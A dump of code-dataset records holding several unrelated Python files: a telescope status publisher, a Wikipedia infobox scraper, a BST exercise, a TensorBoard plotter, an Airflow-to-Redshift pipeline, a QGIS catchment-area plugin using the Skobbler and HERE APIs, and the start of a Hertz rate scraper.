main()\n","sub_path":"code/a5_strategy/baseline.py","file_name":"baseline.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"174959833","text":"#! /usr/bin/env python\n# -*- mode: python; coding: utf-8 -*-\n# Copyright 2017 the HERA Collaboration\n# Licensed under the 2-clause BSD license.\n\n\"\"\"This publishes a webpage on paper1 (leveraging the rails stuff) that includes power levels.\nIf not on qmaster, it just writes the html file.\n\n\"\"\"\nfrom __future__ import absolute_import, division, print_function\n\nfrom hera_mc import mc, cm_utils, sys_handling\n\nif __name__ == '__main__':\n default_hookup_cols = ['station', 'front-end', 'cable-post-amp(in)', 'post-amp', 'cable-container', 'f-engine', 'level']\n parser = mc.get_mc_argument_parser()\n # set values for 'action' to use\n parser.add_argument('-p', '--hpn', help=\"Part number, csv-list (required). HH\", default='HH')\n parser.add_argument('-r', '--revision', help=\"Specify revision or last/active/full/all for hpn. [A]\", default='A')\n parser.add_argument('-e', '--exact-match', help=\"Force exact matches on part numbers, not beginning N char. [False]\",\n dest='exact_match', action='store_true')\n parser.add_argument('-f', '--force-new', dest='force_new', help=\"Force it to write a new hookup file.\", action='store_true')\n parser.add_argument('--hookup-cols', help=\"Specify a subset of parts to show in mapr, comma-delimited no-space list.\",\n dest='hookup_cols', default=default_hookup_cols)\n\n args = parser.parse_args()\n\n # Pre-process the args\n args.hpn = cm_utils.listify(args.hpn)\n args.hookup_cols = cm_utils.listify(args.hookup_cols)\n\n # Start session\n db = mc.connect_to_mc_db(args)\n session = db.sessionmaker()\n\n system = sys_handling.Handling(session)\n system.publish_summary(args.hpn, rev=args.revision, exact_match=args.exact_match, hookup_cols=args.hookup_cols,\n force_new_hookup_dict=args.force_new)\n","sub_path":"scripts/mc_publish_sys_levels.py","file_name":"mc_publish_sys_levels.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"478976389","text":"#!/usr/bin/python3.3\n\n\"\"\"\nID TABLEAU DONNEES WIKIPEDIA\n0 : Ville\n0 : Telephone\n0 : Architecture\n0 : Personnalite\n0 : Film\n0 : Bateau\n3 : Element chimique\n+1 : si bandeau en tableau indiquant modif de l'article à faire (ex: linux)\n+1 : si bandeau en tableau indiquant la présence d'homonymie (ex: google)\n\nFONCTIONS:\n-translation de mot:\n Réalisation=réalisateur,cinéaste\n Masse=poids\n Dimensions=taille\n Créé par/Scénario=auteur,dessinateur\n Pays:origine\n+gestion homonymes: proposer les différents choix et en retenir les urls\n-gestion urls complexes: faire recherche et proposer les choix et retenir les urls\n-multiple backends: wikipedia, google, etc\n\nERREURS:\n+Demander le département d'une ville\n+problème avec les urls en UTF-8+\n+absence de th sur certaines pages (ex:Tintin)\n\nA TESTER:\nutiliser http://fr.mobile.wikipedia.org/ pour plus de rapidite\n\"\"\"\n\nimport urllib.request\nimport re\n\ndef demandeChoix(page):\n start=page.find(\"
        \")\n end=page.find(\"
      \")\n infos=page[start:end]\n rep=[]\n url=\"\"\n temp=infos.split(\"\\n\")\n for i in range(len(temp)):\n p = re.compile(r'\\\" title.*$')\n url = p.sub('',temp[i])\n p = re.compile(r'
        \\n')\n url = p.sub('',url)\n p = re.compile(r'
      • \")\n end=page.find(\"Sommaire\")\n infos=page[start:end]\n return infos\n\ndef getData(texte,typeInfo):\n error=\"\"\n quest=\"\"\n fct=\"Web.getData\"\n data=\"\"\n res=\"\"\n codeErreur=0\n ltypeInfo=typeInfo.split(\" \")\n infos=getWikiInfos(texte)\n search=\"ok\"\n if re.search(\"Cette page d’homonymie répertorie les différents sujets et articles partageant un même nom.\",infos):\n codeErreur=0\n error=\"homonymie\"\n search=\"non\"\n rep=demandeChoix(infos)\n quest=\"Plusieurs choix correspondent à votre demande: \"+texte\n mrep=\"\"\n i=0\n while i < len(rep):\n mrep+=str(i)+\"-\"+str(rep[i])+\"\\n\"\n i=i+1\n quest=quest+\"\\nQuel est votre choix?\\n\"+mrep\n if search==\"ok\":\n itab=0\n if re.search(\"bandeau-titre\",infos):\n itab=itab+infos.count(\"bandeau-titre\")\n tableau=infos.split(\"\\n\")\n for i in range(len(ligne)):\n e=0\n for j in range(len(ltypeInfo)):\n if re.search(ltypeInfo[j]+\"[<|\\b*]\",ligne[i],flags=re.IGNORECASE):\n e=e+1\n if e == len(ltypeInfo):\n res=ligne[i]\n try:\n temp=res.split(\"\\n') \n data = p.sub('',temp[1])\n except:\n temp=res.split(\"\\n') \n data = p.sub('',temp[1])\n p2 = re.compile(r'\\[.*?\\]')\n data = p2.sub('',data)\n p3 = re.compile(r'\\(.*?\\)')\n data = p3.sub('',data)\n p4 = re.compile(r'&#[0-9]{3};')\n data = p4.sub(' ',data)\n p5 = re.compile(r'.*?>')\n data = p5.sub(' ',data)\n codeErreur=1\n if re.search(\"hab.\",data.strip()):\n res=data.strip()[:-5]\n else:\n res=data.strip() \n return codeErreur,error,quest,fct,res\n\n\"\"\"nom=input(\"Entrer le nom de ce sur quoi vous voulez des infos: \")\ntypeInfo=input(\"Entrer le type d'info voulu: \")\nres=getData(nom,typeInfo)\nprint(res[1])\n\"\"\"\n","sub_path":"server/Web.py","file_name":"Web.py","file_ext":"py","file_size_in_byte":4138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"427544569","text":"class Node: \n def __init__(self,key): \n self.left = None\n self.right = None\n self.val = key\n\n def insert(self,root,node):\n if root is None:\n root = node \n else: \n if root.val < node.val:\n if root.right is None:\n root.right = node \n else:\n self.insert(root.right, node)\n else:\n if root.left is None:\n root.left = node\n else:\n self.insert(root.left, node)\n\n def IsPresent(self, root, value):\n if not root:\n return False\n if root.val == value:\n return True\n if root.val > value:\n return self.IsPresent(root.left, value)\n return self.IsPresent(root.right, value)\n\n#Create BST\nr = Node(50) \nr.insert(r,Node(30)) \nr.insert(r,Node(20)) \nr.insert(r,Node(40)) \nr.insert(r,Node(70)) \nr.insert(r,Node(60)) \nr.insert(r,Node(80))\n\nTestData = [\n 10,20,30,40,50,100\n ]\n\ndef Test_BST(data,bst):\n for i,dt in enumerate(data):\n res = bst.IsPresent(bst,dt)\n print(i,res)\n\n\nTest_BST(TestData,r)\n\n\n# search BST 30 min\n# solve 15 min","sub_path":"interviews/engie-lab/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"483090226","text":"import tensorflow.compat.v1 as tf # pycharm says there is no compat module in tensorflow, which is wrong\nimport matplotlib.pyplot as plt\nimport glob\n\n\ndef get_section_results(file):\n \"\"\"\n requires tensorflow==1.12.0\n \"\"\"\n X = []\n Y = []\n # for e in tf.data.TFRecordDataset(file):\n # print(e)\n for e in tf.train.summary_iterator(file):\n for v in e.summary.value:\n if v.tag == 'Train_EnvstepsSoFar':\n X.append(v.simple_value)\n elif v.tag == 'Eval_AverageReturn':\n Y.append(v.simple_value)\n return X, Y\n\n\ndef get_X_Y(logdir, line_width):\n eventfile = glob.glob(logdir)[0]\n\n X, Y = get_section_results(eventfile)\n # X_Y = zip(X, Y)\n X_Y = [X, Y]\n plt.plot(X, Y, linewidth=line_width)\n plt.show()\n # for i, (x, y) in enumerate(zip(X, Y)):\n # print('Iteration {:d} | Train steps: {:d} | Return: {}'.format(i, int(x), y))\n return X_Y\n\n\nif __name__ == '__main__':\n\n\n logdir = '/git/py.code/hw3/homework_fall2020/hw3/cs285/scripts/../data/hw3_q4_ac_1_1-ntu_CartPole-v0_21-10-2020_20-04-38/events*'\n logdirs = [\n '/git/py.code/hw3/homework_fall2020/hw3/cs285/scripts/../data/hw3_q4_ac_1_1-ntu_CartPole-v0_21-10-2020_20-04-38',\n '/git/py.code/hw3/homework_fall2020/hw3/cs285/scripts/../data/hw3_q4_100_1_CartPole-v0_21-10-2020_20-08-47',\n '/git/py.code/hw3/homework_fall2020/hw3/cs285/scripts/../data/hw3_q4_1_100_CartPole-v0_21-10-2020_20-08-57',\n '/git/py.code/hw3/homework_fall2020/hw3/cs285/scripts/../data/hw3_q4_10_10_CartPole-v0_21-10-2020_20-04-35'\n ]\n logdirs = [i + \"/events*\" for i in logdirs]\n X_Y_list = []\n line_width = 0.5\n for logdir in logdirs:\n print(line_width)\n X_Y_list.append(get_X_Y(logdir, line_width=line_width))\n line_width += 0.5\n plt.show()\n","sub_path":"hw3/cs285/scripts/read_results.py","file_name":"read_results.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"147478512","text":"from datetime import datetime, timedelta\nimport logging\nimport os\nfrom operators import *\nfrom helpers import *\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow import DAG\nfrom airflow import settings\nfrom airflow.models import Connection\nfrom aws_configuration_parser import *\nfrom airflow.operators.python_operator import PythonOperator\n\n\n# creating aws configuration object\naws_configs = AwsConfigs(f\"{os.environ['AIRFLOW_HOME']}/credentials/credentials.csv\", \n f\"{os.environ['AIRFLOW_HOME']}/credentials/resources.cfg\")\n\n# Creating redshift connection\nredshift_conn = Connection(conn_id='redshift',\n conn_type='postgres',\n host=aws_configs.REDSHIFT['endpoint'],\n login=aws_configs.REDSHIFT['db_user'],\n password=aws_configs.REDSHIFT['db_password'],\n schema=aws_configs.REDSHIFT['db_name'],\n port=aws_configs.REDSHIFT['port']\n )\n\n# Creating aws connection\naws_conn = Connection(conn_id='aws_credentials',\n conn_type='aws',\n login=aws_configs.ACCESS_KEY,\n password=aws_configs.SECRET_KEY\n )\n\nsession = settings.Session() # get the session\nsession.add(redshift_conn)\nsession.add(aws_conn)\n\nsession.commit() # it will insert the connection object programmatically.\n\n\n\ndefault_args = {\n 'owner': 'naqeeb',\n 'depends_on_past': False,\n 'catchup': False,\n 'start_date': datetime(2020, 3, 1),\n 'retries': 3,\n 'retry_delay': timedelta(minutes=1)\n}\n\ndag = DAG(\n 'udacity-capstone-project',\n default_args=default_args,\n description='Load and transform data in Redshift with Airflow',\n schedule_interval='@hourly'\n )\n\nstart_operator = DummyOperator(task_id='Begin_execution', dag=dag)\nending_operator = DummyOperator(task_id='End_execution',dag=dag)\n# creating a list of tables\ntables = ['forces','neighborhoods','crimes','date','senior_officers',\n 'neighborhood_locations','neighborhood_boundaries','outcomes']\n\n# path S3 which each staging table is loaded\nstaging_tables_dict = {}\n\nfor table in tables:\n if table == 'date':\n continue\n elif table in ['crimes','outcomes']:\n prefix = aws_configs.S3['real_processed_key']\n else:\n prefix = aws_configs.S3['batched_process_key']\n staging_tables_dict[table] = (f\"{prefix}/{table}\",getattr(CreateTableQueries,f\"staging_{table}_table_create\"))\n\nstaging_to_redshift_operations = {}\n\nfor table,(s3_key,create_table_stmt) in staging_tables_dict.items():\n staging_to_redshift_operations[table] = StageToRedshiftOperator(\n task_id=f'Stage_{table}',\n dag=dag,\n redshift_conn_id='redshift',\n aws_credentials_id ='aws_credentials',\n table=f'staging_{table}',\n s3_bucket=aws_configs.S3['BUCKET'],\n s3_key=s3_key,\n region=aws_configs.REGION,\n file_type='JSON',\n create_table_stmt=create_table_stmt,\n drop_table = True\n )\n\ntable_insert_operations = {}\nfor table in tables[:4]:\n if table == 'forces':\n sql_stmt = SQLQueries.stage_table_insert.format(source=f\"staging_{table}\",\n cols=\"*\",\n target=f\"dim_{table}\")\n else:\n sql_stmt = getattr(SQLQueries,f\"{table}_table_insert\")\n table_insert_operations[table] = LoadDimensionOperator(\n task_id=f'Load_{table}_dim_table',\n dag=dag,\n redshift_conn_id='redshift',\n table=f\"dim_{table}\",\n sql_stmt=sql_stmt,\n create_table_stmt=getattr(CreateTableQueries,f\"dim_{table}_table_create\")\n ) \n\nfor table in tables[4:7]:\n insert_stmt = getattr(SQLQueries,f\"{table}_insert_stmt\")\n sql_stmt = SQLQueries.stage_table_insert.format(source=f\"staging_{table}\",\n cols= ','.join(getattr(SQLQueries,f\"{table}_cols\")),\n target=table)\n table_insert_operations[table] = LoadDimensionOperator(\n task_id=f'Load_{table}_table',\n dag=dag,\n redshift_conn_id='redshift',\n table=table,\n insert_stmt=insert_stmt,\n sql_stmt=sql_stmt,\n create_table_stmt=getattr(CreateTableQueries,f\"{table}_table_create\")\n )\n\ntable_insert_operations['outcomes'] = LoadFactOperator(\n task_id=f'Load_fact_outcomes_table',\n dag=dag,\n redshift_conn_id='redshift',\n table=\"fact_outcomes\",\n sql_stmt=SQLQueries.outcomes_table_insert,\n insert_stmt=SQLQueries.outcomes_insert_stmt,\n create_table_stmt= CreateTableQueries.fact_outcomes_table_create\n )\n\ndata_quality_operations = {}\nfor table in ['forces','neighborhoods','crimes','date']:\n data_quality_operations[table] = DataQualityOperator(\n task_id=f'Run_data_quality_checks_dim_{table}',\n dag=dag,\n redshift_conn_id='redshift',\n table = f\"dim_{table}\"\n )\n\nfor table in ['senior_officers','neighborhood_locations','neighborhood_boundaries']:\n data_quality_operations[table] = DataQualityOperator(\n task_id=f'Run_data_quality_checks_{table}',\n dag=dag,\n redshift_conn_id='redshift',\n table = table\n )\n\ndata_quality_operations['outcomes'] = DataQualityOperator(\n task_id=f'Run_data_quality_checks_fact_outcomes',\n dag=dag,\n redshift_conn_id='redshift',\n table = 'fact_outcomes'\n ) \n\nstart_operator >> [operation for key,operation in staging_to_redshift_operations.items()]\n\n[staging_to_redshift_operations[table] for table in ['forces','senior_officers']] >> table_insert_operations['forces']\n[staging_to_redshift_operations[table] for table in ['neighborhoods',\n 'neighborhood_locations',\n 'neighborhood_boundaries']] >> table_insert_operations['neighborhoods']\n \nstaging_to_redshift_operations['crimes'] >> table_insert_operations['crimes']\n[staging_to_redshift_operations['crimes'],staging_to_redshift_operations['outcomes']] >> table_insert_operations['date']\n\nfor table in ['forces','neighborhoods','crimes','date']:\n table_insert_operations[table] >> table_insert_operations['outcomes']\n for other_tables in tables[4:7]:\n table_insert_operations[table] >> table_insert_operations[other_tables]\n\nfor table in tables:\n table_insert_operations[table] >> data_quality_operations[table]\n\nfor table in tables:\n data_quality_operations[table] >> ending_operator\n","sub_path":"capstone-project/dags/udacity-capstone-project.py","file_name":"udacity-capstone-project.py","file_ext":"py","file_size_in_byte":8356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"251356859","text":"# -*- coding: utf-8 -*-\n\"\"\"\n/***************************************************************************\n Location Lab\n A QGIS plugin\n Perform Location Intelligence analysis in QGIS environment\n -------------------\n begin : 2017-07-10\n copyright : (C) 2017 by Sebastian Schulz / GIS Support\n email : sebastian.schulz@gis-support.pl\n git sha : $Format:%H$\n ***************************************************************************/\n\n/***************************************************************************\n * *\n * This program is free software; you can redistribute it and/or modify *\n * it under the terms of the GNU General Public License as published by *\n * the Free Software Foundation; either version 2 of the License, or *\n * (at your option) any later version. *\n * *\n ***************************************************************************/\n This script initializes the plugin, making it known to QGIS.\n\"\"\"\nfrom PyQt4 import uic\nfrom PyQt4.QtCore import QSettings, Qt, QVariant\nfrom PyQt4.QtGui import QDialog, QDialogButtonBox, QDockWidget\nfrom qgis.gui import QgsMapLayerComboBox, QgsMapLayerProxyModel, QgsMessageBar\nfrom qgis.core import QgsCoordinateTransform, QgsCoordinateReferenceSystem, \\\n QgsGeometry, QgsField, QgsMapLayerRegistry, QgsVectorLayer, QgsFeature, \\\n QgsPoint\nimport os.path\nimport locale\nimport urllib2\nimport json\n\nlocale.setlocale(locale.LC_ALL, '')\nFORM_CLASS, _ = uic.loadUiType(os.path.join(\n os.path.dirname(__file__), 'catchments_module.ui'))\n\nHERE_PARAMS = {\n 'Car': 'car',\n 'Pedestrian': 'pedestrian',\n 'Truck': 'truck'\n}\n\nclass CatchmentsModule(QDockWidget, FORM_CLASS):\n def __init__(self, parent, parents=None):\n super(CatchmentsModule, self).__init__(parents)\n self.setupUi(self)\n self.parent = parent\n self.iface = parent.iface\n self.fillDialog()\n\n def fillDialog(self):\n self.layerComboBox = QgsMapLayerComboBox(self)\n self.layerComboBox.setObjectName('layerComboBox')\n self.layerComboBox.setFilters(QgsMapLayerProxyModel.PointLayer)\n self.layersLayout.addWidget(self.layerComboBox)\n self.providersComboBox.addItems(['Skobbler', 'HERE'])\n self.modesComboBox.addItems(['Car', 'Bike', 'Pedestrian'])\n self.unitsComboBox.addItems(['Minutes', 'Meters'])\n self.valueSpinBox.setMinimum(1)\n self.valueSpinBox.setMaximum(99999)\n self.valueSpinBox.setValue(10)\n self.getCatchments.setEnabled(False)\n self.getKeyLabel.setText('

        \\\n \\\n Get key

        '\n )\n self.connectFunctions()\n self.loadKey()\n\n def connectFunctions(self):\n self.providersComboBox.currentIndexChanged.connect(self.changeProvider)\n self.keyLineEdit.textChanged.connect(self.saveKey)\n self.layerComboBox.currentIndexChanged.connect(self.changeLayerEvent)\n self.modesComboBox.currentIndexChanged.connect(self.disableUnnecessaryParams)\n self.selectCheckBox.stateChanged.connect(self.updateFeaturesQuantity)\n self.getCatchments.clicked.connect(self.run)\n\n def disableUnnecessaryParams(self):\n if self.modesComboBox.currentText() == 'Pedestrian':\n self.trafficCheckBox.setEnabled(False)\n self.highwaysCheckBox.setEnabled(False)\n self.tollsCheckBox.setEnabled(False)\n self.highwaysCheckBox.setChecked(False)\n self.tollsCheckBox.setChecked(False)\n self.trafficCheckBox.setChecked(False)\n elif self.providersComboBox.currentText() == 'Skobbler':\n self.trafficCheckBox.setEnabled(False)\n self.highwaysCheckBox.setEnabled(True)\n self.tollsCheckBox.setEnabled(True)\n elif self.providersComboBox.currentText() == 'HERE':\n self.trafficCheckBox.setEnabled(True)\n self.highwaysCheckBox.setEnabled(False)\n self.tollsCheckBox.setEnabled(False)\n\n def changeProvider(self):\n self.modesComboBox.clear()\n if self.providersComboBox.currentText() == 'Skobbler':\n items = ['Car', 'Bike', 'Pedestrian']\n self.highwaysCheckBox.setEnabled(True)\n self.tollsCheckBox.setEnabled(True)\n self.trafficCheckBox.setEnabled(False)\n self.trafficCheckBox.setChecked(False)\n self.getKeyLabel.setText('

        \\\n \\\n Get key

        '\n )\n self.keyLineEdit.setPlaceholderText('Insert Api Code')\n elif self.providersComboBox.currentText() == 'HERE':\n items = ['Car', 'Pedestrian', 'Truck']\n self.trafficCheckBox.setEnabled(True)\n self.highwaysCheckBox.setEnabled(False)\n self.highwaysCheckBox.setChecked(False)\n self.tollsCheckBox.setChecked(False)\n self.tollsCheckBox.setEnabled(False)\n self.getKeyLabel.setText('

        \\\n \\\n Get key

        '\n )\n self.keyLineEdit.setPlaceholderText('Insert App ID and App Code separated by \\':\\'')\n self.modesComboBox.addItems(items)\n self.loadKey()\n\n def saveKey(self):\n value = 'gissupport/location_lab/{}'.format(self.providersComboBox.currentText())\n QSettings().setValue(value, self.keyLineEdit.text())\n\n def loadKey(self):\n value = 'gissupport/location_lab/{}'.format(self.providersComboBox.currentText())\n self.keyLineEdit.setText(QSettings().value(value) or '')\n\n def getPoints(self, vl, features):\n trans = QgsCoordinateTransform(vl.crs(), QgsCoordinateReferenceSystem(4326))\n points = []\n for f in features:\n geom = f.geometry()\n geom.transform(trans)\n if geom.isMultipart():\n points.append(geom.asMultiPoint()[0])\n else:\n points.append(geom.asPoint())\n return points\n\n def requestApi(self, points):\n polygons = []\n not_found = 0\n if self.providersComboBox.currentText() == 'Skobbler':\n \"\"\"\n Skobbler options:\n start string Center of RealReach™ in GPS coordinates: Latitude, Longitude\n transport string You can pick one of the transport options: pedestrian, bike, car\n range int The range for which we calculate RealReach™\n units string You can choose between sec and meter. 'Sec' is for time and 'Meter' is for distance\n toll boolean You can specify whether to avoid or not the use of toll roads in route calculation\n highways boolean Specifies whether to avoid or not the use of highways in route calculation\n \"\"\"\n for p in points:\n params = {\n 'source': self.providersComboBox.currentText(),\n 'url': 'tor.skobbler.net/tor/RSngx/RealReach/json/20_5/en',\n 'key': self.keyLineEdit.text().strip(),\n 'start': '{x},{y}'.format(x=p[1], y=p[0]),\n 'transport': self.modesComboBox.currentText().lower(),\n 'range': self.valueSpinBox.value() if self.unitsComboBox.currentText() == 'Meters' else self.valueSpinBox.value() * 60,\n 'units': 'meter' if self.unitsComboBox.currentText() == 'Meters' else 'sec',\n 'nonReachable': '0',\n 'toll': '1' if self.tollsCheckBox.isChecked() else '0',\n 'highways': '1' if self.highwaysCheckBox.isChecked() else '0',\n 'response_type': 'gps'\n }\n link = 'http://{key}.{url}/{key}\\\n ?start={start}\\\n &transport={transport}\\\n &range={range}\\\n &units={units}\\\n &nonReachable={nonReachable}\\\n &toll={toll}\\\n &highways={highways}\\\n &response_type={response_type}'.replace(' ', '').format(**params)\n try:\n r = urllib2.urlopen(link)\n except urllib2.HTTPError as e:\n return 'invalid key'\n continue\n data = json.loads(r.read())\n if data['status']['apiMessage'] == 'Route cannot be calculated.':\n not_found += 1\n continue\n params['coordinates'] = data['realReach']['gpsPoints']\n polygons.append(params)\n elif self.providersComboBox.currentText() == 'HERE':\n \"\"\"\n HERE options:\n start string lat and lng\n mode string car, pedestrian or truck\n range int range for calculations\n rangetype string distance, time, consumption\n traffic boolean takes traffic\n \"\"\"\n for p in points:\n params = {\n 'source': self.providersComboBox.currentText(),\n 'url': 'http://isoline.route.cit.api.here.com/routing/7.2/calculateisoline.json',\n 'key': self.keyLineEdit.text().strip().split(':'),\n 'start': '{x},{y}'.format(x=p[1], y=p[0]),\n 'transport': HERE_PARAMS[self.modesComboBox.currentText()],\n 'range': self.valueSpinBox.value() if self.unitsComboBox.currentText() == 'Meters' else self.valueSpinBox.value() * 60,\n 'units': 'distance' if self.unitsComboBox.currentText() == 'Meters' else 'time',\n 'traffic': 'enabled' if self.trafficCheckBox.isChecked() else 'disabled'\n }\n link = '{url}\\\n ?app_id={key[0]}\\\n &app_code={key[1]}\\\n &mode=fastest;{transport};traffic:{traffic}\\\n &start=geo!{start}\\\n &range={range}\\\n &rangetype={units}'.replace(' ', '').format(**params)\n try:\n r = urllib2.urlopen(link)\n except urllib2.HTTPError as e:\n return 'invalid key'\n continue\n if r.getcode() == 403:\n return 'forbidden'\n params['coordinates'] = json.loads(r.read())['response']['isoline'][0]['component'][0]['shape']\n polygons.append(params)\n if polygons and not_found:\n self.iface.messageBar().pushMessage(\n u'Catchments',\n u'{} catchments not found'.format(not_found),\n level=QgsMessageBar.INFO)\n return polygons\n\n def addPolygonsToMap(self, polygons):\n if not QgsMapLayerRegistry.instance().mapLayersByName('Location Lab - catchments'):\n vl = QgsVectorLayer('Polygon?crs=EPSG:4326', 'Location Lab - catchments', 'memory')\n pr = vl.dataProvider()\n vl.startEditing()\n pr.addAttributes(\n [\n QgsField('id', QVariant.Int),\n QgsField('provider', QVariant.String),\n QgsField('mode', QVariant.String),\n QgsField('value', QVariant.Int),\n QgsField('units', QVariant.String),\n QgsField('lat', QVariant.Double),\n QgsField('lon', QVariant.Double),\n QgsField('params', QVariant.String)\n ]\n )\n vl.commitChanges()\n QgsMapLayerRegistry.instance().addMapLayer(vl)\n vl = QgsMapLayerRegistry.instance().mapLayersByName('Location Lab - catchments')[0]\n pr = vl.dataProvider()\n next_id = len(vl.allFeatureIds()) + 1\n for p in polygons:\n feature = QgsFeature()\n points = []\n if p['source'] == 'Skobbler':\n coordinates_x = [c for c in p['coordinates'][8::2]]\n coordinates_y = [c for c in p['coordinates'][9::2]]\n for x, y in zip(coordinates_x, coordinates_y):\n points.append(QgsPoint(x, y))\n elif p['source'] == 'HERE':\n coordinates = [c.split(',') for c in p['coordinates']]\n for xy in coordinates:\n points.append(QgsPoint(float(xy[1]), float(xy[0])))\n feature = QgsFeature()\n feature.setGeometry(QgsGeometry.fromPolygon([points]))\n lat, lon = p['start'].split(',')\n for key in ['key', 'url', 'coordinates', 'start']: #unnecessary params\n p.pop(key)\n feature.setAttributes([\n next_id,\n self.providersComboBox.currentText(),\n self.modesComboBox.currentText().lower(),\n self.valueSpinBox.value(),\n self.unitsComboBox.currentText(),\n float(lat),\n float(lon),\n str(p)\n ])\n pr.addFeatures([feature])\n next_id += 1\n vl.updateExtents()\n self.iface.mapCanvas().setExtent(\n QgsCoordinateTransform(\n vl.crs(),\n self.iface.\n mapCanvas().\n mapRenderer().\n destinationCrs()).\n transform(vl.extent()))\n self.iface.mapCanvas().refresh()\n\n def changeLayerEvent(self):\n vl = self.layerComboBox.currentLayer()\n if not vl:\n return\n self.updateFeaturesQuantity()\n vl.selectionChanged.connect(self.updateFeaturesQuantity)\n\n def updateFeaturesQuantity(self):\n vl = self.layerComboBox.currentLayer()\n if not vl:\n return\n if self.selectCheckBox.isChecked():\n features = [f for f in vl.selectedFeatures()]\n else:\n features = [f for f in vl.getFeatures()]\n self.pointsLabel.setText('Number of points: {}'.format(len(features)))\n if len(features) > 5:\n self.getCatchments.setEnabled(False)\n self.pointsLabel.setText('Number of points: {} (limit is 5)'.format(len(features)))\n elif len(features) == 0:\n self.getCatchments.setEnabled(False)\n else:\n self.getCatchments.setEnabled(True)\n\n def show(self):\n self.changeLayerEvent()\n self.iface.addDockWidget(Qt.LeftDockWidgetArea, self)\n super(CatchmentsModule, self).show()\n\n def checkApiKey(self):\n if self.providersComboBox.currentText() == 'HERE':\n if len(self.keyLineEdit.text().split(':')) != 2:\n self.iface.messageBar().pushMessage(\n u'Catchments',\n u'Invalid api key format, required app_id:app_code',\n level=QgsMessageBar.WARNING)\n return False\n return True\n\n def run(self):\n vl = self.layerComboBox.currentLayer()\n if self.selectCheckBox.isChecked():\n features = [f for f in vl.selectedFeatures()]\n else:\n features = [f for f in vl.getFeatures()]\n if not features:\n self.iface.messageBar().pushMessage(\n u'Catchments',\n u'No geometry',\n level=QgsMessageBar.WARNING)\n return\n points = self.getPoints(vl, features)\n if not self.checkApiKey():\n return\n polygons = self.requestApi(points)\n if not polygons:\n self.iface.messageBar().pushMessage(\n u'Catchments',\n u'Catchments not found',\n level=QgsMessageBar.WARNING)\n return\n elif polygons == 'invalid key':\n self.iface.messageBar().pushMessage(\n u'Catchments',\n u'Invalid API key',\n level=QgsMessageBar.WARNING)\n return \n elif polygons == 'forbidden':\n self.iface.messageBar().pushMessage(\n u'Catchments',\n u'These credentials do not authorize access',\n level=QgsMessageBar.WARNING)\n return \n self.addPolygonsToMap(polygons)","sub_path":"catchments_module.py","file_name":"catchments_module.py","file_ext":"py","file_size_in_byte":17023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"370213540","text":"class Solution:\n \"\"\"\n @param s: a string which consists of lowercase or uppercase letters\n @return: the length of the longest palindromes that can be built\n \"\"\"\n def longestPalindrome(self, s):\n #put string to list for sort\n listS = list(s)\n #sort list so that the same char will be together\n listS.sort()\n #to save the result\n result = []\n loopPosition = 0\n palindromeLength = 0\n while loopPosition < len(listS)-1:\n #if the char are same and the number is even, keep both\n #else keep finding the paired char\n if listS[loopPosition] == listS[loopPosition+1]:\n loopPosition+=2\n palindromeLength+=2\n else:\n loopPosition+=1\n \n #if palindrome length less the the original length\n #that means we have char not in pair, which we can add to middle\n #else all char are in pair and just return palindrome length \n if palindromeLength < len(listS):\n return palindromeLength+1\n else:\n return palindromeLength\n \n","sub_path":"Python_Solutions/longestPalindrome.py","file_name":"longestPalindrome.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"81363509","text":"from bs4 import BeautifulSoup\nfrom lxml import html\nimport pandas as pd\nimport requests\nimport json\nimport re\nimport time\nimport logging\nimport asyncio\nfrom timeit import default_timer\nfrom concurrent.futures import ThreadPoolExecutor\nimport hertzcommons as hc\n\n#logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nlogging.basicConfig(level=logging.INFO, filename='hertCacl.log', filemode='w', format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n\nSTART_TIME = default_timer()\n\ndef extracRateCel(columns):\n rateEngineTotal = {}\n\n if len(columns) > 2:\n #print(columns)\n rateEngineTotal['total'] = hc.convertToFloat((columns[1].get_text()).strip())\n rateEngineTotal['app'] = hc.convertToFloat((columns[2].get_text()).strip())\n rateEngineTotal['db'] = hc.convertToFloat((columns[3].get_text()).strip())\n rateEngineTotal['gdd'] = hc.convertToFloat((columns[4].get_text()).strip())\n rateEngineTotal['rules'] = hc.convertToFloat((columns[5].get_text()).strip())\n rateEngineTotal['txn'] = hc.convertToFloat((columns[6].get_text()).strip())\n rateEngineTotal['tps'] = hc.convertToFloat((columns[7].get_text()).strip())\n\n return rateEngineTotal\n\ndef processCalcTable(cellTable):\n rows = cellTable.find_all('tr')\n return extracRateCel(rows[9].find_all('td'))\n\ndef processRateCalc(data_source, source):\n soup = BeautifulSoup(source,'lxml')\n cellTables = soup.find_all('table')\n print('cell tables', len(cellTables))\n \n #processSimple(cellTables[15])\n\n allEngines = {}\n allEngines['WASCell_01_DCDB6'] = processCalcTable(cellTables[2])\n allEngines['WASCell_02_DCDB7'] = processCalcTable(cellTables[4])\n allEngines['WASCell_03_DCDB8'] = processCalcTable(cellTables[6])\n allEngines['WASCell_04_DCDB9'] = processCalcTable(cellTables[8])\n allEngines['WASCell_05_DCDB10'] = processCalcTable(cellTables[10])\n allEngines['WASCell_06_DCDB11'] = processCalcTable(cellTables[12])\n allEngines['WASCell_07_DCDB12'] = processCalcTable(cellTables[14])\n\n allEngines['WASCell_01_RCDB6'] = processCalcTable(cellTables[3])\n allEngines['WASCell_02_RCDB7'] = processCalcTable(cellTables[5])\n allEngines['WASCell_03_RCDB8'] = processCalcTable(cellTables[7])\n 